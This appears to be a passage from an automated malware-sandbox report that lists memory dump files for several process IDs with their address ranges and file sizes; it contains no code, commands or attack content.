                          • memory/2620-186-0x0000000022A90000-0x0000000022AA9000-memory.dmp

                            Filesize

                            100KB

                          • memory/2620-187-0x0000000022A90000-0x0000000022AA9000-memory.dmp

                            Filesize

                            100KB

                          • memory/2620-73-0x0000000022060000-0x0000000022094000-memory.dmp

                            Filesize

                            208KB

                          • memory/2620-72-0x0000000022060000-0x0000000022094000-memory.dmp

                            Filesize

                            208KB

                          • memory/2620-69-0x0000000022060000-0x0000000022094000-memory.dmp

                            Filesize

                            208KB

                          • memory/2620-65-0x0000000000600000-0x0000000001854000-memory.dmp

                            Filesize

                            18.3MB

                          • memory/2620-63-0x0000000000600000-0x0000000001854000-memory.dmp

                            Filesize

                            18.3MB

                          • memory/2620-183-0x0000000022A90000-0x0000000022AA9000-memory.dmp

                            Filesize

                            100KB

                          • memory/3724-88-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB

                          • memory/3724-86-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB

                          • memory/3724-81-0x0000000000400000-0x0000000000462000-memory.dmp

                            Filesize

                            392KB

                          • memory/4268-83-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/4268-80-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/4268-87-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/4268-85-0x0000000000400000-0x0000000000478000-memory.dmp

                            Filesize

                            480KB

                          • memory/5040-29-0x0000000005EE0000-0x0000000005F46000-memory.dmp

                            Filesize

                            408KB

                          • memory/5040-45-0x0000000007980000-0x0000000007A16000-memory.dmp

                            Filesize

                            600KB

                          • memory/5040-39-0x0000000006010000-0x0000000006364000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/5040-41-0x0000000006640000-0x000000000665E000-memory.dmp

                            Filesize

                            120KB

                          • memory/5040-42-0x0000000006670000-0x00000000066BC000-memory.dmp

                            Filesize

                            304KB

                          • memory/5040-43-0x0000000007F60000-0x00000000085DA000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/5040-44-0x0000000006BB0000-0x0000000006BCA000-memory.dmp

                            Filesize

                            104KB

                          • memory/5040-25-0x0000000005080000-0x00000000050B6000-memory.dmp

                            Filesize

                            216KB

                          • memory/5040-28-0x0000000005E70000-0x0000000005ED6000-memory.dmp

                            Filesize

                            408KB

                          • memory/5040-27-0x0000000005760000-0x0000000005782000-memory.dmp

                            Filesize

                            136KB

                          • memory/5040-46-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

                            Filesize

                            136KB

                          • memory/5040-26-0x00000000057D0000-0x0000000005DF8000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/5040-49-0x0000000009140000-0x000000000DA83000-memory.dmp

                            Filesize

                            73.3MB

                          • memory/5040-47-0x0000000008B90000-0x0000000009134000-memory.dmp

                            Filesize

                            5.6MB